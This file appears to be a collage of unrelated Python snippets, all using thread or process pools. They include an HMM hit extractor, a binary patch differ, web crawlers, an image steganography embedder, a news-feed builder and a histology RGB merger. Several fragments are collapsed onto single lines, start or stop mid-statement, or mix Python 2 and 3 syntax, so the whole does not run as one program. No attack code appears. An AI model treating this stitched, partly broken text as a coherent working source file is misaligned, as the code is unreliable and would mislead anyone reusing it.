def make_unaln_files(search_dir, best_extension, cutoff, dbpath, outdir, outext,
                     force=False, index_type="sfetch", threads=2, multi=False):
    """Collect the best hits per HMM and extract their sequences into files.

    Every ``*.<best_extension>`` file in ``search_dir`` is read as
    tab-separated rows whose first column is the HMM name:

    * ``best``: the next column is kept when the column after it is
      ``<= cutoff``;
    * ``best_multi``: every remaining column is a comma-separated hit whose
      first field is kept (only the first column unless ``multi`` is set).

    For each HMM with at least ``Min_taxa`` hits, a job for
    ``<outdir>/<HMM>.<outext>`` is queued (existing files are skipped unless
    ``force``) and run with ``run_cdbyank`` or ``run_sfetch`` on ``threads``
    threads, depending on ``index_type``.

    :return: -1 when the database index file does not exist, otherwise None
    """
    orthologs = {}
    index_type = index_type.lower()

    # Path of the index that must already exist next to the database.
    if index_type == "cdbfasta":
        dbidx = dbpath + CDBYANKEXT
    elif index_type == "sfetch":
        dbidx = dbpath + SFETCHEXT
    else:
        dbidx = ""

    if not os.path.exists(outdir):
        os.makedirs(outdir)

    if not os.path.exists(dbidx):
        print("No dbidx %s exists for reading" % (dbidx))
        return -1

    suffix = "." + best_extension
    for entry in os.listdir(search_dir):
        if not entry.endswith(suffix):
            continue
        with open(os.path.join(search_dir, entry), "r") as fh:
            for line in fh:
                row = line.strip().split("\t")
                HMMname = row.pop(0)  # take first col as HMM name
                if best_extension == "best":
                    if float(row[1]) <= float(cutoff):
                        orthologs.setdefault(HMMname, []).append(row[0])
                elif best_extension == "best_multi":
                    hits = row if multi else [row[0]]
                    for hit in hits:
                        orthologs.setdefault(HMMname, []).append(hit.split(",")[0])

    pool = ThreadPool(threads)

    fileset = []
    for orth, members in orthologs.items():
        outfile = "%s.%s" % (os.path.join(outdir, orth), outext)
        needs_writing = force or (not os.path.exists(outfile))
        if needs_writing and len(members) >= Min_taxa:
            fileset.append([dbpath, outfile, "\n".join(members) + "\n"])

    if index_type == "cdbfasta":
        results = pool.map(run_cdbyank, fileset)
    elif index_type == "sfetch":
        results = pool.map(run_sfetch, fileset)

    # close the pool and wait for the work to finish
    pool.close()
    pool.join()
run_result = automata_run_stat(atm=atm, file_path=input_path[uat], cycle_detail=True, report_detail=False, bytes_per_dim=1) real_final.append(run_result[total_reports]) appr_run_result = automata_run_stat(atm=appr_automata, file_path=input_path[uat], cycle_detail=True, report_detail=False, bytes_per_dim=1, translation_dic=translation_dic) approximate_final.append(appr_run_result[total_reports]) with open(str(uat) + '.ttxt', "a") as f: print >> f, "real reports: " + str(real_final[-1]) print >> f, "approximate reports: " + str(approximate_final[-1]) print >> f, "real nodes count: " + str(atm.nodes_count) print >> f, "approximate nodes count:" + str(appr_automata.nodes_count) print >>f, "----------------------------------------------------------------" with open(str(uat) + '.ttxt', "a") as f: print >>f, "***************sum*******************" print >>f, "real reports: " + str(sum(real_final)) print >>f, "approximate reports: " + str(sum(approximate_final)) print >>f, "real nodes count: " + str(real_states) print >>f, "approximate nodes count:" + str(appr_states) if __name__ == '__main__': ds = [a for a in AnmalZoo] thread_count = 8 t_pool = ThreadPool(thread_count) results = t_pool.map(process_single_ds, ds) t_pool.close() t_pool.join()
# Get a Virtual Network context by Name print('\n====> Get a Virtual Network Context by Name: {}'.format(vnname)) print(json.dumps(dnac.get_virtual_network_by_name(vnname), indent=2)) # Get a Virtual Network context by Id vnid = dnac.get_virtual_network_id(vnname) print('\n====> Get a Virtual Network Context by Id: {}'.format(vnid, vnname)) print(json.dumps(dnac.get_virtual_network_by_id(vnid), indent=2)) # Delete a Virtual Network context print('\n==== Deleting Virtual Network: {} ===='.format(vnname)) response = dnac.delete_virtual_network_by_name(vnname, asynch=False) print(json.dumps(response, indent=2)) # Get a Virtual Network context ID given its name vnname = 'INFRA_VN' print('\n====> Get a Virtual Network Context ID given its name:') print('Virtual Network context Name: {}'.format(vnname)) print('Virtual Network context ID: {}'.format(dnac.get_virtual_network_id(vnname))) # Multi-threading pool = Pool(4) thread_timeout = 8640 operations = [] operations.append((dnac.exists_virtual_network, {'vn_name': vnname})) data = pool.map_async(utils.run_workers, operations).get(thread_timeout) pool.close() pool.join() print(data)
def diff(self, from_file, to_file, out_file, log_file):
    """
    Split binaries in chunks, diff each chunk and generate a file with all
    chunks (binary patch, compressed or empty)

    :param from_file: path of the old binary (must not be empty)
    :param to_file: path of the new binary (must not be empty and must
        differ from ``from_file``)
    :param out_file: path of the patch file to write; its directory is
        created when missing
    :param log_file: path receiving the patch information as JSON
    :return: ``(use_patch, patch_information)``; ``use_patch`` is False when
        the LZG-compressed new file is not larger than the patch
    :raises AssertionError: when either file is empty or both hash equal
    """
    out_dir = os.path.dirname(out_file)
    if out_dir and not os.path.exists(out_dir):
        os.mkdir(out_dir)

    with open(to_file, 'rb') as t, open(from_file, 'rb') as f:
        from_mmap = mmap.mmap(f.fileno(), 0, prot=mmap.PROT_READ)
        to_mmap = mmap.mmap(t.fileno(), 0, prot=mmap.PROT_READ)

        from_len = from_mmap.size()
        assert from_len != 0
        to_len = to_mmap.size()
        assert to_len != 0

        from_hash = sha256(from_mmap).digest()
        to_hash = sha256(to_mmap).digest()
        assert from_hash != to_hash

        from_list = list(self._chunk(from_mmap))
        to_list = list(self._chunk(to_mmap))

        if self.verbose:
            # NOTE(review): the message reports self.threads, but the pool
            # below is sized by cpu_count() - confirm which one is intended.
            print("Using %d threads" % (self.threads))

        # One task per chunk of the new file: (old chunk, new chunk, index).
        # Chunks beyond the end of the old file are diffed against nothing.
        tasks = []
        for index, new_chunk in enumerate(to_list):
            old_chunk = from_list[index] if index < len(from_list) else list()
            tasks.append((old_chunk, new_chunk, index))

        # The diff runs while both files are still open, so the chunks stay
        # valid even if they reference the memory maps.
        pool = ThreadPool(multiprocessing.cpu_count())
        try:
            results = pool.map(self._diff_with_exception, tasks)
        finally:
            pool.close()
            pool.join()

    total_bytes = 0
    patch_information = {}
    patch_information["chunks"] = {}
    # ``with`` guarantees the patch file is flushed and closed on return.
    with open(out_file, "wb") as out_fd:
        for result in results:
            patch_information["chunks"]["%d" % result.get("_id")] = result
            if result["_type"] > CHUNK_TYPE_KEEP:
                chunk_path = "%s/%s" % (self.temp_directory, result['_name'])
                with open(chunk_path, "rb") as in_fd:
                    in_buffer = mmap.mmap(in_fd.fileno(), 0, prot=mmap.PROT_READ)
                    try:
                        total_bytes += result['size_output']
                        out_fd.write(in_buffer)
                    finally:
                        in_buffer.close()

    with open(to_file, "rb") as to_fd:
        to_file_data = to_fd.read()
    to_file_len = len(to_file_data)
    to_file_compressed_len = len(LZG().compress(to_file_data))
    to_file_crc = binascii.crc32(to_file_data)

    patch_information.update({
        "chunk_size": self.chunk_size,
        "_name": os.path.basename(out_file),
        "size": total_bytes,
        "size_patch": total_bytes,
        "size_compressed": to_file_compressed_len,
        "size_original": to_file_len,
        # Mask to an unsigned 32-bit value before formatting.
        "crc": "0x%x" % (to_file_crc & 0xffffffff),
        "gain_vs_original": to_file_len - total_bytes,
        "gain_vs_compressed": to_file_compressed_len - total_bytes,
        "ratio_vs_original": "%0.5f" % (1.0 * total_bytes / to_file_len),
        "ratio_vs_compressed": "%0.5f" % (1.0 * total_bytes / to_file_compressed_len),
    })

    if to_file_compressed_len <= total_bytes:
        # Shipping the compressed new file is at least as small as the patch.
        patch_information["_name"] = os.path.basename(to_file)
        patch_information["size"] = to_file_compressed_len
        patch_information["gain_vs_original"] = to_file_len - to_file_compressed_len
        patch_information["gain_vs_compressed"] = 0
        patch_information["ratio_vs_original"] = "%0.5f" % \
            (1.0 * to_file_compressed_len / to_file_len)
        patch_information["ratio_vs_compressed"] = 1
        use_patch = False
    else:
        use_patch = True

    with open(log_file, 'w') as f:
        f.write(json.dumps(patch_information, indent=4, sort_keys=True))

    if self.verbose:
        print(json.dumps(patch_information, indent=4, sort_keys=True))

    return use_patch, patch_information
class BaseSpider:
    """
    Basic simple spider

    Right in class you can specify such arguments:
        urls - list of str urls.
        data_handlers - list of data handlers. The data from parsing
            function goes right there.
        workers - number of workers in the Pool.

    You can overload such functions:
        parse(self, request, html) - parse data here. This method accepts
            scrapping.requests.Request and bs4.BeautifulSoup arguments.
        get_requests(self) - if you don't have prepared urls to parse find
            them here and return as scrapping.requests.Request object.
            Other data types would be ignored.
    """
    workers = 5
    urls = []
    data_handlers = []
    name = None

    def __init__(self, urls=None, name=None, workers=None, data_handlers=None):
        # Constructor arguments override the class-level defaults.
        self.urls = urls if urls else self.urls
        self.workers = workers if workers else self.workers
        self.data_handlers = data_handlers if data_handlers else self.data_handlers
        self._stored_requests = []

        self.name = name if name else self.name
        if not self.name:
            self.name = self.__class__.__name__

        self.logger = logging.getLogger(self.name)

    def get_requests(self):
        """
        Use this method to navigate through requests/links

        return/yield:
            scrapping.requests.Request object

        Note: if parsing function is not specified the default one will be used
        """
        return [Request(url) for url in self.urls]

    def parse(self, request, html):
        """
        Default parsing function

        return/yield:
            dict with parsed data
            scrapping.requests.Request object
        """
        self.logger.warning("{} for {} parse method empty! Returning None.".format(self.name, request._url))

    def start(self):
        "Starts crawling"
        self.logger.info("{} started!".format(self.name))

        # for storing the data open data handlers
        self.open_data_handlers()

        for request in self.get_requests():
            # keep only real Request objects and make sure each has a parser
            if isinstance(request, Request):
                if not request.parser:
                    request.parser = self.parse
                self._stored_requests.append(request)

        self.pool = ThreadPool(self.workers)
        # all requests are parsed in parallel
        ret_items = self.pool.map(self._handle_request, self._stored_requests)

        # wait until the first round is done
        self.pool.close()
        self.pool.join()

        # unpack returned packed objects from pool
        ret_items = self._unpack_packed(ret_items)
        self._save_ret_items_data(ret_items)

        # keep crawling while parsers return further Request objects
        while any(ret_items):
            # clean the list, only Requests left
            ret_requests = [item for item in ret_items if isinstance(item, Request)]
            for request in ret_requests:
                if not request.parser:
                    request.parser = self.parse

            self.pool = ThreadPool(self.workers)
            # all requests are parsed in parallel
            ret_items = list(self.pool.map(self._handle_request, ret_requests))

            # unpack returned packed objects from pool
            ret_items = self._unpack_packed(ret_items)
            self._save_ret_items_data(ret_items)

            # wait until this round is done
            self.pool.close()
            self.pool.join()

        self.close_data_handlers()

    def _unpack_packed(self, i):
        """Unpacks all packed items (lists, at any depth) in the given list.

        The list is flattened in place, keeping the items in order, and is
        also returned. (Removing entries from the list while iterating over
        it skipped the element that followed each unpacked list.)
        """
        flat = []

        def _flatten(sequence):
            for obj in sequence:
                if isinstance(obj, list):
                    _flatten(obj)
                else:
                    flat.append(obj)

        _flatten(i)
        i[:] = flat
        return i

    def _handle_request(self, request):
        "Waits for the request, parses it and returns dict/Request results"
        # prepare data to parse and call the parser
        request.join()
        bs_obj = BeautifulSoup(request.text, 'lxml')
        ret = request.parser(request, bs_obj)

        # a generator parser may yield many items; keep dicts and Requests
        if isinstance(ret, types.GeneratorType):
            return [item for item in ret if isinstance(item, (dict, Request))]
        return ret if isinstance(ret, (dict, Request)) else None

    def _save_ret_items_data(self, items):
        "Handle every parsed data in returned sequence"
        for item in items:
            if isinstance(item, dict):
                self.handle_data(item)

    def handle_data(self, data):
        "Gives data to data_handlers"
        self.logger.debug("DATA: {}".format(data))
        for handler in self.data_handlers:
            handler.process(data)

    def open_data_handlers(self):
        "Calls setUp(self) on every data handler"
        for handler in self.data_handlers:
            handler.setUp(self)
            self.logger.debug("Data handler {} set up.".format(handler.__class__.__name__))

    def close_data_handlers(self):
        "Calls tearDown() on every data handler"
        for handler in self.data_handlers:
            handler.tearDown()
            self.logger.debug("{} closed.".format(handler.__class__.__name__))
def fetch_group_time_series(self, time_series_request_list):
    """Fetch several time series concurrently and outer-join the results.

    Each request in ``time_series_request_list`` is passed to
    ``self.fetch_single_time_series`` on a worker pool. Results that are
    ``None`` are discarded and the remainder are combined with
    ``TimeSeriesCalcs.pandas_outer_join``.

    :param time_series_request_list: sequence of request objects; the
        ``data_source`` attribute of the first one selects the pool size.
    :return: the joined data frame, or ``None`` when there is nothing to fetch.
    """
    # Nothing to download: avoid indexing into an empty list below.
    if not time_series_request_list:
        return None

    constants = Constants()
    time_series_calcs = TimeSeriesCalcs()

    # Compare by value: ``is`` on a string literal only works by accident of
    # interning and raises a SyntaxWarning on modern interpreters.
    if constants.time_series_factory_thread_technique == "thread":
        # Most of the time is spent waiting for the data vendor to return,
        # so threads are sufficient.
        from multiprocessing.dummy import Pool
    else:
        # Must use multiprocessing_on_dill, otherwise objects cannot be
        # pickled correctly. Note: currently not very stable.
        from multiprocessing_on_dill import Pool

    # Pool size is configured per data source, with 'other' as the fallback.
    thread_no_by_source = constants.time_series_factory_thread_no
    thread_no = thread_no_by_source['other']
    data_source = time_series_request_list[0].data_source
    if data_source in thread_no_by_source:
        thread_no = thread_no_by_source[data_source]

    pool = Pool(thread_no)
    try:
        # Run the downloads in their own workers and collect the results.
        data_frame_group = pool.map_async(
            self.fetch_single_time_series, time_series_request_list).get()
    finally:
        # Always release the workers, even when a download raises.
        pool.close()
        pool.join()

    if data_frame_group is None:
        return None

    # Drop failed/empty downloads before joining.
    data_frame_group = [df for df in data_frame_group if df is not None]
    return time_series_calcs.pandas_outer_join(data_frame_group)
def embed_message(embed_fn, path, payload, output_dir, embed_fn_saving=False):
    """Embed ``payload`` into one image or every valid image under a directory.

    :param embed_fn: callable doing the embedding. Called as
        ``embed_fn(src, payload, dst)`` when ``embed_fn_saving`` is true,
        otherwise as ``embed_fn(src, payload)`` and its return value is saved
        as an image at ``dst``.
    :param path: an image file, or a directory that is walked recursively.
    :param payload: passed through to ``embed_fn`` unchanged.
    :param output_dir: destination directory; created if missing.
    :param embed_fn_saving: whether ``embed_fn`` writes the output itself.

    Files whose basename already exists in ``output_dir`` are skipped.
    """
    path = utils.absolute_path(path)
    if not os.path.exists(output_dir):
        os.makedirs(output_dir)
    output_dir = utils.absolute_path(output_dir)

    # Collect candidate input files.
    files = []
    if os.path.isdir(path):
        for dirpath, _, filenames in os.walk(path):
            for f in filenames:
                # Use a dedicated name: do not clobber the ``path`` argument.
                candidate = os.path.abspath(os.path.join(dirpath, f))
                if not utils.is_valid_image(candidate):
                    print("Warning, please provide a valid image: ", f)
                else:
                    files.append(candidate)
    else:
        files = [path]

    # Remove files already generated in a previous execution.
    pending = []
    for f in files:
        dst_path = os.path.join(output_dir, os.path.basename(f))
        if os.path.exists(dst_path):
            print("Warning! file already exists, ignored:", dst_path)
            continue
        pending.append(f)
    files = pending

    def embed(src_path):
        """Embed the payload into one file and store it in ``output_dir``."""
        dst_path = os.path.join(output_dir, os.path.basename(src_path))
        if embed_fn_saving:
            embed_fn(src_path, payload, dst_path)
        else:
            X = embed_fn(src_path, payload)
            try:
                scipy.misc.toimage(X, cmin=0, cmax=255).save(dst_path)
            except Exception as e:
                # Best effort: report the failure and carry on with the rest.
                print(str(e))

    # Process the files in batches, one thread pool per batch.
    batch = 1000
    n_core = cpu_count()
    for i in range(0, len(files), batch):
        files_batch = files[i:i + batch]
        print("Using", n_core, "threads")
        pool = ThreadPool(n_core)
        try:
            pool.map(embed, files_batch)
        finally:
            # map() has returned, so close/join is enough to release threads.
            pool.close()
            pool.join()
class RenderLocaleBatch(object):
    """Groups render jobs into fixed-size batches and renders them.

    Jobs are appended with :meth:`add`. They can then be rendered on a thread
    pool (:meth:`render_start` followed by :meth:`render_finish`) or inline
    with :meth:`render_sync`.
    """

    BATCH_DEFAULT_SIZE = 300  # Default number of documents in a batch.

    def __init__(self, jinja_env, profile, tick=None, batch_size=None):
        self.jinja_env = jinja_env
        self.profile = profile
        self.tick = tick
        self.batch_size = batch_size or self.BATCH_DEFAULT_SIZE
        # There is always at least one (possibly empty) batch.
        self.batches = [[]]
        self._thread_pool = None
        self._results = None
        self._is_rendering = False

    def __len__(self):
        """Total number of queued items across all batches."""
        return sum(len(batch) for batch in self.batches)

    def _get_batch(self):
        """Return the batch to append to, opening a new one when full."""
        if len(self.batches[-1]) >= self.batch_size:
            self.batches.append([])
        return self.batches[-1]

    def add(self, controller, *args, **kwargs):
        """Add an item to be rendered to the batch."""
        item = {
            'controller': controller,
            'jinja_env': self.jinja_env,
            'args': args,
            'kwargs': kwargs,
        }
        self._get_batch().append(item)

    def render_start(self):
        """Start the batches rendering."""
        # One worker per batch; results arrive in completion order.
        self._thread_pool = ThreadPool(len(self.batches))
        self._results = self._thread_pool.imap_unordered(
            render_func, self.batches)
        self._is_rendering = True

    def render_finish(self):
        """Finish in progress batches rendering.

        Returns a ``(rendered_docs, render_errors)`` tuple. Raises
        ``RenderNotStartedError`` when :meth:`render_start` was not called.
        """
        if not self._is_rendering:
            raise RenderNotStartedError('Rendering was never started')

        rendered_docs = []
        render_errors = []
        for batch_result in self._results:
            render_errors.extend(batch_result.render_errors)
            rendered_docs.extend(batch_result.rendered_docs)
            if self.tick:
                # One progress tick per error and per rendered document.
                for _ in batch_result.render_errors:
                    self.tick()
                for _ in batch_result.rendered_docs:
                    self.tick()
            for result in batch_result.rendered_docs:
                self.profile.add_timer(result.render_timer)

        self._thread_pool.close()
        self._thread_pool.join()
        self._is_rendering = False
        return rendered_docs, render_errors

    def render_sync(self):
        """Syncronous rendering for non-threaded rendering."""
        rendered_docs = []
        render_errors = []
        for batch in self.batches:
            batch_result = render_func(batch, tick=self.tick)
            render_errors.extend(batch_result.render_errors)
            rendered_docs.extend(batch_result.rendered_docs)
        return rendered_docs, render_errors
def get_news_feed(tags_for_feed, blocked_news):
    """Build a user news feed from weighted tags.

    :param tags_for_feed: mapping of tag -> interest coefficient.
    :param blocked_news: list of URLs that must not be shown again; URLs
        picked for this feed are appended to it in place.
    :return: the value of ``FormUserFeed`` for the fetched articles, or
        ``None`` when there are no tags.
    """
    feedsize = 9
    tags_for_feed = list(tags_for_feed.items())
    random.shuffle(tags_for_feed)
    tags_for_feed = tags_for_feed[:feedsize]

    # Guard before computing the mean: dividing by len() of an empty list
    # would raise ZeroDivisionError.
    if not tags_for_feed:
        return None

    high_tier = []
    low_tier = []
    mean = sum(item[1] for item in tags_for_feed) / len(tags_for_feed)
    if len(tags_for_feed) >= feedsize:
        # Split tags around the mean coefficient.
        for item in tags_for_feed:
            if item[1] > mean:
                high_tier.append(item)
            else:
                low_tier.append(item)
    else:
        # Too few tags: pad the feed by sampling tags with repetition.
        while len(high_tier) < feedsize:
            high_tier.append(random.choice(tags_for_feed))

    random.shuffle(low_tier)
    random.shuffle(high_tier)
    tags_for_feed = high_tier + low_tier

    start = time.time()
    pool1 = ThreadPool(len(tags_for_feed))
    try:
        urls = pool1.map(GetResponses, tags_for_feed)
    finally:
        pool1.close()
        pool1.join()
    end = time.time()
    print("get urls from rss", end - start)

    urls_to_parse = []
    start = time.time()
    for tag_item, tag_urls in zip(tags_for_feed, urls):
        # Distinct name for the comprehension variable so it can never
        # clobber the outer loop state (it leaks on Python 2).
        fresh = [url for url in tag_urls if url not in blocked_news]
        if fresh:
            urls_to_parse.append({
                'tag': tag_item[0],
                'coef': tag_item[1],
                'url': fresh[0],
            })
            blocked_news.append(fresh[0])
    end = time.time()
    print("form non repeating dict", end - start)

    start = time.time()
    pool2 = ThreadPool(feedsize)
    try:
        results = pool2.map(GetTxt, urls_to_parse)
    finally:
        pool2.close()
        pool2.join()
    end = time.time()
    print("parsing news", end - start)

    SortNewsByInterest(results)
    results = FormUserFeed(results)
    return results
def initiate_threads():
    """Run ``traverse_directory`` over ``self.valid_directories`` on 5 workers.

    ``self`` is not a parameter here; it is resolved from the enclosing scope.
    """
    workers = Pool(5)
    directories = self.valid_directories
    workers.map(traverse_directory, directories)
    # Block until every directory has been processed.
    workers.close()
    workers.join()
if not op: print('Unknown operation {}'.format(op_code)) sys.exit(3) op_lists.append(op_list) counter = Counter() thread_pool = Pool(WORKER_COUNT) print('Thread pool initialised with {} worker{}'.format( WORKER_COUNT, '' if WORKER_COUNT == 1 else 's')) matches = [] for dir_info in os.walk(image_dir): dir_name, _, file_names = dir_info print('Processing {}...'.format(dir_name)) for file_name in file_names: if EXTENSION_REGEX.match(file_name): if AUGMENTED_FILE_REGEX.match(file_name): counter.skipped_augmented() else: process(dir_name, file_name, op_lists) else: counter.skipped_no_match() print("Waiting for workers to complete...") thread_pool.close() thread_pool.join() print(counter.get())
class Engine(object):
    """Crawler engine wiring spiders, scheduler, downloader and pipelines.

    Work is dispatched on ``self.pool`` with ``apply_async``; each finished
    fetch task re-schedules itself through :meth:`_callback` until
    ``self.is_running`` is cleared.
    """

    def __init__(self):
        if settings.IS_DISTRIBUTE:
            self.collector = RedisStatsCollector()
        else:
            self.collector = NormalStatsCollector()
        self.scheduler = Scheduler(self.collector)

        # Instantiate the core components.
        self.spiders = self._auto_import_instances(settings.SPIDERS,
                                                   isspider=True)
        self.downloader = Downloader()
        self.pipelines = self._auto_import_instances(settings.PIPELINES)

        # Instantiate the middlewares.
        self.spider_mids = self._auto_import_instances(
            settings.SPIDERS_MIDDLEWARES)
        self.down_mids = self._auto_import_instances(
            settings.DOWNLOADER_MIDDLEWARES)

        # Worker pool.
        self.pool = Pool()
        # While true, finished tasks keep re-scheduling themselves.
        self.is_running = True

    def _auto_import_instances(self, path=None, isspider=False):
        """Import and instantiate the classes named in a settings list.

        path: iterable of dotted ``module.ClassName`` strings.
        isspider: when true return ``{cls.name: instance}`` instead of a list,
            because spiders are looked up by name.
        """
        instances = {} if isspider else []
        for dotted in (path or []):
            module_name, cls_name = dotted.rsplit(".", 1)
            module = importlib.import_module(module_name)
            cls = getattr(module, cls_name)
            if isspider:
                # Spider dict: {spider_name: spider_instance}
                instances[cls.name] = cls()
            else:
                # Pipeline / middleware list: [instance1, instance2, ...]
                instances.append(cls())
        return instances

    def _start_requests(self):
        """Queue the start requests of every spider (one task per spider)."""

        # 1. spider --request--> engine
        def _func(spider_name, spider):
            for request in spider.start_requests():
                # Spider middlewares: process the request.
                for spider_mid in self.spider_mids:
                    request = spider_mid.process_request(request)
                # Tag the request with the key of the spider that owns it.
                request.spider_name = spider_name
                # 2. engine --request--> scheduler
                self.scheduler.add_request(request)
                # Count the request.
                self.collector.incr(self.collector.request_nums_key)

        for spider_name, spider in self.spiders.items():
            # args must be an ordered tuple: a set literal loses the argument
            # order and requires both values to be hashable.
            self.pool.apply_async(_func, args=(spider_name, spider))

    def execute_request_response_item(self):
        """Take one request off the scheduler, download it and parse it."""
        # 3. scheduler --request--> engine
        request = self.scheduler.get_request()
        # Nothing queued right now: return so the task can be re-scheduled.
        if request is None:
            return

        # Downloader middlewares: process the request.
        for down_mid in self.down_mids:
            request = down_mid.process_request(request)

        # 4. engine --request--> downloader
        # 5. downloader --response--> engine
        response = self.downloader.get_response(request)
        # Carry the request's meta over to the response.
        response.meta = request.meta

        # Downloader middlewares: process the response.
        for down_mid in self.down_mids:
            response = down_mid.process_response(response)
        # Spider middlewares: process the response.
        for spider_mid in self.spider_mids:
            response = spider_mid.process_response(response)

        # 6. engine --response--> spider
        # Spiders are stored by name, so no iteration is needed to find the
        # one that issued this request.
        spider = self.spiders[request.spider_name]
        # The request names the parse method to apply to its response.
        parse = getattr(spider, request.parse)

        for result in parse(response):
            # 7. the engine dispatches on the result type
            if isinstance(result, Request):
                # New requests inherit the spider key ...
                result.spider_name = request.spider_name
                # ... pass through the spider middlewares again ...
                for spider_mid in self.spider_mids:
                    result = spider_mid.process_request(result)
                # ... and go back to the scheduler.
                self.scheduler.add_request(result)
                # The new request is queued, so it must be counted too.
                self.collector.incr(self.collector.request_nums_key)
            else:
                # Items: engine --item--> pipelines
                for pipeline in self.pipelines:
                    pipeline.process_item(result, spider)

        # Count the handled response.
        self.collector.incr(self.collector.response_nums_key)

    def _callback(self, item):
        """Pool callback: schedule the next fetch task while running."""
        if self.is_running:
            self.pool.apply_async(self.execute_request_response_item,
                                  callback=self._callback,
                                  error_callback=self._error_back)

    def _error_back(self, e):
        """Pool error callback: log exceptions raised in worker tasks."""
        logger.exception(e)
        raise e

    def _start(self):
        """Drive the four modules until the crawl is complete."""
        # Queue the start requests on the pool.
        self.pool.apply_async(self._start_requests,
                              error_callback=self._error_back)

        # Maximum concurrency is fixed at 5 fetch tasks.
        for _ in range(5):
            # Pass the callable itself, not the result of calling it.
            self.pool.apply_async(self.execute_request_response_item,
                                  callback=self._callback,
                                  error_callback=self._error_back)

        # Sum of the spiders' time_task values; the loop below can only
        # terminate when this is zero (no incremental spiders).
        sum_task = sum([spider.time_task for spider in self.spiders.values()])

        while True:
            time.sleep(0.001)
            if sum_task != 0:
                continue
            # Requests are queued asynchronously: wait until at least one
            # has been counted before testing for completion.
            if self.collector.request_nums == 0:
                continue
            handled = (self.collector.response_nums +
                       self.collector.repeat_request_nums)
            if handled >= self.collector.request_nums:
                # Every request was answered or rejected as a duplicate.
                self.is_running = False
                break

        self.pool.close()
        self.pool.join()

    def start(self):
        """Run the crawl and log timing and counters afterwards."""
        start_time = datetime.now()
        self._start()
        end_time = datetime.now()

        logger.info('this is a distribute spider:{}'.format(
            settings.IS_DISTRIBUTE))
        logger.info('the self_async is {}'.format(settings.ASYNC_TYPE))
        logger.info('the spider start at {}'.format(start_time))
        logger.info('the spider end in {}'.format(end_time))
        logger.info("the request's total is {}".format(
            self.collector.request_nums))
        logger.info("the repetitive request's total is {}".format(
            self.collector.repeat_request_nums))
        logger.info("the response's total is {}".format(
            self.collector.response_nums))
        logger.info('the spider pass with {}'.format(
            (end_time - start_time).total_seconds()))
        # Clear the counters kept by the collector.
        self.collector.clear()
g.create_dataset('label_classification', data=classi,dtype=np.uint8) g.close() return data data=[] csv_data = [line.rstrip('\r\n') for line in open('training.csv')] csv_data = csv_data[1:] h5_size = 30000 for c,i in enumerate(range(7, 8)): #int(len(csv_data)/h5_size))): print(i) m = ThreadPool(12) data = m.map(load_image_thread, csv_data[(i*h5_size)+1:(i+1)*h5_size+1]) m.close() images = [x[0] for x in data] reg = [x[1] for x in data] classi = [x[2] for x in data] g = h5py.File("h5/training"+str(i+1)+".hdf5", "w") g.create_dataset('data', data=images,dtype=np.float32) g.create_dataset('label_regression', data=reg,dtype=np.float32) g.create_dataset('label_classification', data=classi,dtype=np.uint8) g.close() ''' reste=len(csv_data)-int(len(csv_data)/h5_size)*h5_size m = ThreadPool(12)
thread.start() for thread in threads: thread.join() except Exception, e: print 'error', str(e) if __name__ == '__main__': # 填写参数:用户名密码 俱乐部ID 和 俱乐部主域名 共多少页(这个选填) username = '******' password = '******' clubid = '1166' host = 'shlunyu' totalPage = 36 opener = login("http://passport.tiyushe.com/?rc=SSO&ra=login&ajax=1", username, password) url = 'http://' + host + '.tiyushe.com/?c=clubmanage&a=member&cid=' + clubid + '&page={0}' childUrl = 'http://' + host + '.tiyushe.com/?c=clubmanage&a=add_member&cid={0}&uid={1}' filename = 'getData.csv' page_pool = ThreadPool(totalPage / 2) page_list = [] for i in range(1, totalPage + 1): u = url.format(i) page_list.append(u) page_pool.map_async(get_list, (page_list)) page_pool.close() page_pool.join()
def colorize(self, col_out_dir, final_out_dir):
    """
    Transform the split colour channels and merge them into one RGB volume.

    Each channel stack is transformed through ``Transform_Wrapper`` on a
    worker pool (skipped when every expected output slice already exists),
    volumized, passed through ``self.final_apply_transform`` and finally
    merged and saved under ``final_out_dir``.

    :param col_out_dir: accepted for interface compatibility; not read here.
    :param final_out_dir: directory receiving
        ``RGB_aligned_histology_vol.nii.gz``.
    """
    color_dir = self.orig_slice_by_slice_loc + '/color/'
    volumes_dir = self.orig_slice_by_slice_loc + '/color/volumes/'
    channels = [
        ('Blue', self.hist_NIFTI.Blue_vol),
        ('Green', self.hist_NIFTI.Green_vol),
        ('Red', self.hist_NIFTI.Red_vol),
    ]

    # Skip the transformation only if every slice of every channel exists;
    # all() stops at the first missing file.
    slice_count = len(self.hist_NIFTI.slices)
    all_exist = all(
        os.path.isfile(color_dir + name + '/' + vol.slices[j].name)
        for name, vol in channels
        for j in range(slice_count))

    if all_exist:
        print(
            ' - All Color Channel Split Transformed Files Exist. Utilizing currently existing data.'
        )
    else:
        print(
            '====================================ATTEMPTING TO MULTITHREAD===================================='
        )
        for name, vol in channels:
            vol.col = name
        slice_indices = list(range(len(self.hist_transform.slices)))
        pool = Pool(processes=self.threads)
        try:
            # Pass the volume itself; iterating with enumerate() here would
            # hand Transform_Wrapper an (index, volume) tuple.
            for _, vol in channels:
                pool.map(
                    Transform_Wrapper(vol, self.hist_transform,
                                      self.BF_NIFTI, color_dir),
                    slice_indices)
        finally:
            pool.close()
            pool.join()

    # Load the transformed channel stacks and convert each to a volume.
    reference = self.BF_NIFTI
    for name, prefix in (('Red', 'r'), ('Green', 'g'), ('Blue', 'b')):
        stack = Stacks.NIFTI_Stack(color_dir + name + '/')
        stack.affine_3D = reference.affine_3D
        stack.volumize(volumes_dir + prefix + '_vol.nii.gz')

    # Transform the colour-split volumes to the MRI space.
    for prefix in ('b', 'g', 'r'):
        self.final_apply_transform(
            volumes_dir + prefix + '_vol.nii.gz',
            volumes_dir + 'final_' + prefix + '_vol.nii.gz')

    # Load the transformed volumes and merge the channels.
    print('Loading RGB')
    r_data = nib.load(volumes_dir + 'final_r_vol.nii.gz').get_data()
    g_data = nib.load(volumes_dir + 'final_g_vol.nii.gz').get_data()
    b_data = nib.load(volumes_dir + 'final_b_vol.nii.gz').get_data()

    print('Merging Channels')
    rgb = np.empty((r_data.shape[0], r_data.shape[1], r_data.shape[2], 3))
    # NOTE(review): blue is written to index 0 and red to index 2, while the
    # structured dtype below labels index 0 'R'. Kept as in the original;
    # confirm whether the stored channels are intentionally BGR.
    rgb[:, :, :, 0] = b_data
    rgb[:, :, :, 1] = g_data
    rgb[:, :, :, 2] = r_data
    rgb = rgb.astype('u1')

    # Save the RGB volume as a structured (R, G, B) uint8 image.
    print('Saving Volume')
    shape_3d = rgb.shape[0:3]
    rgb_dtype = np.dtype([('R', 'u1'), ('G', 'u1'), ('B', 'u1')])
